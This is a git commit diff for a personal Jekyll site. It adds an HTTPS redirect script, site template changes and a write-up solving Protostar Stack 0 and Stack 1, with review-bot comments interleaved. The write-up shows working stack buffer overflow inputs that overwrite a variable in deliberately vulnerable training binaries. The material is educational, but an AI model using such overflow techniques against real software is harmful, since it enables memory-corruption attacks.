new site4

master
Paul Walko 2016-06-15 01:06:03 -04:00
parent dac869dc5d
commit cabe6e0794
12 changed files with 275 additions and 29 deletions

View File

@ -10,7 +10,8 @@ excerpt_separator: "[-----]"
# mode: dev
mode: product
url: http://paul.walko.org/
url: https://paul.walko.org/
enforce_ssl: paul.walko.org/
devurl: http://localhost:4000/
name: Paul Walko
title: Paul Walko
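Review bot: `enforce_ssl: paul.walko.org/` carries a trailing slash, while the redirect script added to the head template in this commit compares `window.location.host` against a hardcoded `"paul.walko.org"`, and a host value never contains a slash. If the template is meant to read this key the comparison would never match. Either drop the slash and have the template use the setting, or remove the key so the host is defined in one place.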
@ -27,13 +28,9 @@ my:
address:
country: United States
skills:
security: ["Wireshark", "IDA", "Ollydebug"]
security: ["Wireshark", "IDA", "GDB"]
coding: ["C", "C++", "Python", "Java", "bash", "HTML"]
tools: ["Linux"]
collections:
qqGroupGuide:
output: true
tools: ["Linux", "vim", "Arch Linux"]
defaults:
- scope:
@ -41,8 +38,5 @@ defaults:
type: "posts"
values:
excerpt: "{{ page.content }} | slice: 0 300"
- scope:
path: ""
type: "qqGroupGuide"
values:
layout: markdownreader_bare

View File

@ -1,4 +1,9 @@
<meta charset="utf-8">
<script type="text/javascript">
var host = "paul.walko.org";
if ((host == window.location.host) && (window.location.protocol != "https:"))
window.location.protocol = "https";
</script>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="{% if page.excerpt %}{{ page.excerpt | strip_html | strip_newlines | truncate: 160 }}{% else %}{{ site.description }}{% endif %}">
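Review bot: The inline script that sets `window.location.protocol = "https"` runs only after the page has already been fetched over plain HTTP, so that first response can still be read or altered in transit, including removal of this script. Enforce HTTPS at the server or CDN with a permanent redirect and send a `Strict-Transport-Security` header on the HTTPS responses; keep the script only as a fallback if the host cannot issue redirects. The host name is also hardcoded here although the same commit adds `enforce_ssl` to the config.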
@ -29,6 +34,10 @@
<script type="text/javascript" src="{{crturl}}javascripts/jquery.js"></script>
<link rel="canonical" href=" { { site.url } }{ { page.url } }" />
<!--[if lt IE 9]>
<script src="{{crturl}}javascripts/html5shiv.js"></script>
<![endif]-->
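Review bot: The canonical link's `href=" { { site.url } }{ { page.url } }"` has spaces inside the brace pairs, so Liquid will not treat them as output tags, and the generated pages in this commit carry the literal text. Write it as `{{ site.url }}{{ page.url }}` with no leading space in the attribute. Since `url` in the config ends with `/`, also guard against the double slash that the sitemap entries in this commit already show.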

View File

@ -37,7 +37,7 @@
$('#dummySearch').submit(function(e) {
e.preventDefault();
keyword = $('#search').val();
url = 'https://www.google.com.hk/search?q=site%3Apaul.walko.org+' + keyword;
url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword;
location.href = url;
})
})
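Review bot: `keyword` is concatenated into the search URL unencoded on the changed `url = ...` line, so input containing `&`, `#` or `+` changes the query that is actually sent. Wrap it in `encodeURIComponent(keyword)`, and declare `keyword` and `url` with `var` so they do not become globals.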

View File

@ -1,7 +1,99 @@
---
title: "Protostar Exploit Exercises Solutions 0-3"
title: "Protostar Exploit Exercises Solutions 0-1"
layout: post
category: writeup
tags: [exploit-exercises, protostar, hacking]
excerpt: "Walkthrough for Protostar exercises on exploit-exercises.com"
---
# Stack 0
Here's what we're given:
```
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
modified = 0;
gets(buffer);
if(modified != 0) {
printf("you have changed the 'modified' variable\n");
} else {
printf("Try again?\n");
}
}
```
The first thing I took note of is the size of the `buffer`: 64 bytes. After that, the program inputs text for `buffer`, and then checks to see if you modified the `modified` variable.
I'm guessing if I put in a string longer than 64 bytes it will work. Let's see:
```
$ echo `python -c 'print "A"*64'` | ./stack0
Try again?
```
That works as expected, now with 65 bytes:
```
$ echo `python -c 'print "A"*65'` | ./stack0
you have changed the 'modified' variable
```
Solved!
# Stack 1
Here's the code we're given:
```
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
if(argc == 1) {
errx(1, "please specify an argument\n");
}
modified = 0;
strcpy(buffer, argv[1]);
if(modified == 0x61626364) {
printf("you have correctly got the variable to the right value\n");
} else {
printf("Try again, you got 0x%08x\n", modified);
}
}
```
Just like Stack 0, we're given a `buffer` array size 64 bytes and we're also asked to input the contents of it. Except it looks like modified has to equal `0x61626364` instead of just changing it like before.
Keep in mind this is [little endian](https://en.wikipedia.org/wiki/Endianness), so I'll input the value in reverse order:
```
$ ./stack1 `python -c 'print "A"*64'`
Try again, you got 0x00000000
```
That works as expected, now with the additional bytes:
```
$ ./stack1 `python -c 'print "A"*64 + "\x64\x63\x62\x61"'`
you have correctly got the variable to the right value
```
Woo!
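Review bot: The Stack 0 section shows that 64 bytes leave `modified` unchanged and 65 bytes change it, but never says why. State that `gets` and `strcpy` do no bounds checking and that the results imply `modified` sits directly after `buffer` in this build, so the first byte past the 64th lands in it. In Stack 1 the sentence "so I'll input the value in reverse order" is followed by the 64-byte baseline run rather than the run that uses the reversed bytes; move it above the second command. The fenced blocks could also carry a language tag for highlighting.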

View File

@ -5,6 +5,11 @@
<html>
<head>
<meta charset="utf-8">
<script type="text/javascript">
var host = "paul.walko.org";
if ((host == window.location.host) && (window.location.protocol != "https:"))
window.location.protocol = "https";
</script>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="Paul Walko's personal website">
@ -35,6 +40,10 @@
<script type="text/javascript" src="http://paul.walko.org/javascripts/jquery.js"></script>
<link rel="canonical" href=" { { site.url } }{ { page.url } }" />
<!--[if lt IE 9]>
<script src="http://paul.walko.org/javascripts/html5shiv.js"></script>
<![endif]-->
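Review bot: The context lines in this generated page still load `http://paul.walko.org/javascripts/jquery.js` and `html5shiv.js` over plain HTTP while the same file now redirects itself to HTTPS. Browsers block scripts requested over HTTP from an HTTPS page as mixed content, which would break the jQuery-based `#dummySearch` handler. Regenerate the site with the new `https://` `url`, or use root-relative paths such as `/javascripts/jquery.js`. The same applies to the other generated pages in this commit.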
@ -81,7 +90,7 @@
$('#dummySearch').submit(function(e) {
e.preventDefault();
keyword = $('#search').val();
url = 'https://www.google.com.hk/search?q=site%3Apaul.walko.org+' + keyword;
url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword;
location.href = url;
})
})

View File

@ -5,6 +5,11 @@
<html>
<head>
<meta charset="utf-8">
<script type="text/javascript">
var host = "paul.walko.org";
if ((host == window.location.host) && (window.location.protocol != "https:"))
window.location.protocol = "https";
</script>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="Paul Walko's personal website">
@ -35,6 +40,10 @@
<script type="text/javascript" src="http://paul.walko.org/javascripts/jquery.js"></script>
<link rel="canonical" href=" { { site.url } }{ { page.url } }" />
<!--[if lt IE 9]>
<script src="http://paul.walko.org/javascripts/html5shiv.js"></script>
<![endif]-->
@ -81,7 +90,7 @@
$('#dummySearch').submit(function(e) {
e.preventDefault();
keyword = $('#search').val();
url = 'https://www.google.com.hk/search?q=site%3Apaul.walko.org+' + keyword;
url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword;
location.href = url;
})
})

View File

@ -5,6 +5,11 @@
<html>
<head>
<meta charset="utf-8">
<script type="text/javascript">
var host = "paul.walko.org";
if ((host == window.location.host) && (window.location.protocol != "https:"))
window.location.protocol = "https";
</script>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="Paul Walko's personal website">
@ -35,6 +40,10 @@
<script type="text/javascript" src="http://paul.walko.org/javascripts/jquery.js"></script>
<link rel="canonical" href=" { { site.url } }{ { page.url } }" />
<!--[if lt IE 9]>
<script src="http://paul.walko.org/javascripts/html5shiv.js"></script>
<![endif]-->
@ -81,7 +90,7 @@
$('#dummySearch').submit(function(e) {
e.preventDefault();
keyword = $('#search').val();
url = 'https://www.google.com.hk/search?q=site%3Apaul.walko.org+' + keyword;
url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword;
location.href = url;
})
})
@ -139,7 +148,7 @@
</div>
<div class="col-lg-10 col-md-10 col-sm-10">
<h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-3</a></h2>
<h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-1</a></h2>
<ul class="tags">
<li><i class="fa fa-tag"> exploit-exercises</i></li>
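Review bot: The link text now reads "Protostar Exploit Exercises Solutions 0-1" but the `href` is still `/writeup/nebula_exploit_exercises`. Nebula and Protostar are different exercise sets, so the permalink is misleading. Rename the post so the path matches its content, and add a redirect from the old path if it was already published.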

View File

@ -5,6 +5,11 @@
<html>
<head>
<meta charset="utf-8">
<script type="text/javascript">
var host = "paul.walko.org";
if ((host == window.location.host) && (window.location.protocol != "https:"))
window.location.protocol = "https";
</script>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="Paul Walko's personal website">
@ -35,6 +40,10 @@
<script type="text/javascript" src="http://paul.walko.org/javascripts/jquery.js"></script>
<link rel="canonical" href=" { { site.url } }{ { page.url } }" />
<!--[if lt IE 9]>
<script src="http://paul.walko.org/javascripts/html5shiv.js"></script>
<![endif]-->
@ -81,7 +90,7 @@
$('#dummySearch').submit(function(e) {
e.preventDefault();
keyword = $('#search').val();
url = 'https://www.google.com.hk/search?q=site%3Apaul.walko.org+' + keyword;
url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword;
location.href = url;
})
})
@ -107,7 +116,7 @@
</div>
<div class="col-lg-10 col-md-10 col-sm-10">
<h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-3</a></h2>
<h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-1</a></h2>
<ul class="tags">
<li><i class="fa fa-tag"> exploit-exercises</i></li>

View File

@ -6,13 +6,13 @@
<url>
<loc>http://paul.walko.org//writeup/nebula_exploit_exercises</loc>
<lastmod>2016-06-15T00:02:53-04:00</lastmod>
<lastmod>2016-06-15T01:05:43-04:00</lastmod>
<changefreq>weekly</changefreq>
</url>
<url>
<loc>http://paul.walko.org//writeup/test_post</loc>
<lastmod>2016-06-15T00:02:53-04:00</lastmod>
<lastmod>2016-06-15T01:05:43-04:00</lastmod>
<changefreq>weekly</changefreq>
</url>
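Review bot: Both `<loc>` values keep the `http://` scheme and a double slash (`http://paul.walko.org//writeup/...`) even though the config `url` becomes `https://paul.walko.org/` in this commit. Build the sitemap entries from the site URL without its trailing slash so they match the canonical HTTPS addresses.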

View File

@ -5,6 +5,11 @@
<html>
<head>
<meta charset="utf-8">
<script type="text/javascript">
var host = "paul.walko.org";
if ((host == window.location.host) && (window.location.protocol != "https:"))
window.location.protocol = "https";
</script>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="Paul Walko's personal website">
@ -35,6 +40,10 @@
<script type="text/javascript" src="http://paul.walko.org/javascripts/jquery.js"></script>
<link rel="canonical" href=" { { site.url } }{ { page.url } }" />
<!--[if lt IE 9]>
<script src="http://paul.walko.org/javascripts/html5shiv.js"></script>
<![endif]-->
@ -81,7 +90,7 @@
$('#dummySearch').submit(function(e) {
e.preventDefault();
keyword = $('#search').val();
url = 'https://www.google.com.hk/search?q=site%3Apaul.walko.org+' + keyword;
url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword;
location.href = url;
})
})
@ -167,7 +176,7 @@
</div>
<div class="col-lg-10 col-md-10 col-sm-10">
<h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-3</a></h2>
<h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-1</a></h2>
<ul class="tags">
<li><i class="fa fa-tag"> exploit-exercises</i></li>
@ -330,7 +339,7 @@
</div>
<div class="col-lg-10 col-md-10 col-sm-10">
<h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-3</a></h2>
<h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-1</a></h2>
<ul class="tags">
<li><i class="fa fa-tag"> exploit-exercises</i></li>
@ -425,7 +434,7 @@
</div>
<div class="col-lg-10 col-md-10 col-sm-10">
<h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-3</a></h2>
<h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-1</a></h2>
<ul class="tags">
<li><i class="fa fa-tag"> exploit-exercises</i></li>

View File

@ -5,11 +5,16 @@
<html>
<head>
<meta charset="utf-8">
<script type="text/javascript">
var host = "paul.walko.org";
if ((host == window.location.host) && (window.location.protocol != "https:"))
window.location.protocol = "https";
</script>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="Walkthrough for Protostar exercises on exploit-exercises.com">
<title>Protostar Exploit Exercises Solutions 0-3</title>
<title>Protostar Exploit Exercises Solutions 0-1</title>
<!-- favicon -->
<link rel="apple-touch-icon" sizes="57x57" href="http://paul.walko.org/favicon/apple-icon-57x57.png">
@ -35,6 +40,10 @@
<script type="text/javascript" src="http://paul.walko.org/javascripts/jquery.js"></script>
<link rel="canonical" href=" { { site.url } }{ { page.url } }" />
<!--[if lt IE 9]>
<script src="http://paul.walko.org/javascripts/html5shiv.js"></script>
<![endif]-->
@ -85,7 +94,7 @@
$('#dummySearch').submit(function(e) {
e.preventDefault();
keyword = $('#search').val();
url = 'https://www.google.com.hk/search?q=site%3Apaul.walko.org+' + keyword;
url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword;
location.href = url;
})
})
@ -100,7 +109,7 @@
<div class="row">
<div id="markdown-container" class="col-lg-9">
<header>
<p id="postTitle">Protostar Exploit Exercises Solutions 0-3</p>
<p id="postTitle">Protostar Exploit Exercises Solutions 0-1</p>
<ul class="tags clearfix">
@ -116,7 +125,95 @@
</header>
<h1 id="stack-0">Stack 0</h1>
<p>Heres what were given:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
modified = 0;
gets(buffer);
if(modified != 0) {
printf("you have changed the 'modified' variable\n");
} else {
printf("Try again?\n");
}
}
</code></pre>
</div>
<p>The first thing I took note of is the size of the <code class="highlighter-rouge">buffer</code>: 64 bytes. After that, the program inputs text for <code class="highlighter-rouge">buffer</code>, and then checks to see if you modified the <code class="highlighter-rouge">modified</code> variable.
Im guessing if I put in a string longer than 64 bytes it will work. Lets see:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>$ echo `python -c 'print "A"*64'` | ./stack0
Try again?
</code></pre>
</div>
<p>That works as expected, now with 65 bytes:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>$ echo `python -c 'print "A"*65'` | ./stack0
you have changed the 'modified' variable
</code></pre>
</div>
<p>Solved!</p>
<h1 id="stack-1">Stack 1</h1>
<p>Heres the code were given:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
if(argc == 1) {
errx(1, "please specify an argument\n");
}
modified = 0;
strcpy(buffer, argv[1]);
if(modified == 0x61626364) {
printf("you have correctly got the variable to the right value\n");
} else {
printf("Try again, you got 0x%08x\n", modified);
}
}
</code></pre>
</div>
<p>Just like Stack 0, were given a <code class="highlighter-rouge">buffer</code> array size 64 bytes and were also asked to input the contents of it. Except it looks like modified has to equal <code class="highlighter-rouge">0x61626364</code> instead of just changing it like before.</p>
<p>Keep in mind this is <a href="https://en.wikipedia.org/wiki/Endianness">little endian</a>, so Ill input the value in reverse order:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>$ ./stack1 `python -c 'print "A"*64'`
Try again, you got 0x00000000
</code></pre>
</div>
<p>That works as expected, now with the additional bytes:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>$ ./stack1 `python -c 'print "A"*64 + "\x64\x63\x62\x61"'`
you have correctly got the variable to the right value
</code></pre>
</div>
<p>Woo!</p>
</div>
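Review bot: The generated paragraphs read "Heres what were given", "Im guessing" and "Ill input" where the Markdown source in this commit has "Here's", "we're", "I'm" and "I'll", so the apostrophes are being lost in the build. Check the Markdown converter's smart-quote handling and the file encoding. Consider not committing generated output at all, so the source and the built pages cannot drift apart.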

View File

@ -5,6 +5,11 @@
<html>
<head>
<meta charset="utf-8">
<script type="text/javascript">
var host = "paul.walko.org";
if ((host == window.location.host) && (window.location.protocol != "https:"))
window.location.protocol = "https";
</script>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="This is an excerpt; please ignore">
@ -35,6 +40,10 @@
<script type="text/javascript" src="http://paul.walko.org/javascripts/jquery.js"></script>
<link rel="canonical" href=" { { site.url } }{ { page.url } }" />
<!--[if lt IE 9]>
<script src="http://paul.walko.org/javascripts/html5shiv.js"></script>
<![endif]-->
@ -85,7 +94,7 @@
$('#dummySearch').submit(function(e) {
e.preventDefault();
keyword = $('#search').val();
url = 'https://www.google.com.hk/search?q=site%3Apaul.walko.org+' + keyword;
url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword;
location.href = url;
})
})